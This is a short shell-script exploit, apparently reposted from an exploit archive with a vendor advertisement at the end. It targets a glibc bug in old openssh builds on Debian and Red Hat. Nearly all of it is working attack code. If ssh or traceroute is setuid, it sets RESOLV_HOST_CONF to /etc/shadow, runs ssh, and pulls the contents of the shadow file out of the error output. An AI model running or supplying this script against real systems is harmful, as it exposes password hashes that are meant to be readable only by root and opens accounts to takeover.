Glibc-2.2 and openssh-2.3.0p1 exploit glibc versions 2.1.9x and higher on specific systems.
======================================================
glibc-2.2 and openssh-2.3.0p1 exploits glibc >= 2.1.9x
======================================================
# Charles Stevenson <[email protected]>
# glibc-2.2 and openssh-2.3.0p1 (Debian 2.3 , Redhat 7.0)
# This exploits is for glibc >= 2.1.9x.
# (****[email protected]****)
# Edit this if you have a problem with path
ssh=/usr/bin/ssh
traceroute=/usr/sbin/traceroute
FILE=/etc/shadow # File to read
###############################################################################
echo "$ssh"
echo "[*] Checking permisions..."
if [ ! -u $ssh ]; then
echo "$ssh is NOT setuid on this system or does not exist at all!"
if [ ! -u $traceroute ]; then
echo "$traceroute is NOT setuid on this system or does not exist at all!"
exit 0
fi
fi
export RESOLV_HOST_CONF=$FILE
echo "[*] Glibc bug found by Charles Stevenson <[email protected]>"
echo "[*] [email protected]"
sleep 1
echo "[*] export RESOLV_HOST_CONF=/etc/shadow"
ssh lt 2>/tmp/.resolv
cat /tmp/.resolv | cut -d"\`" -f5,2 | awk -F"\'" '{print $1} '
# 0day.today [2018-04-05] #
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo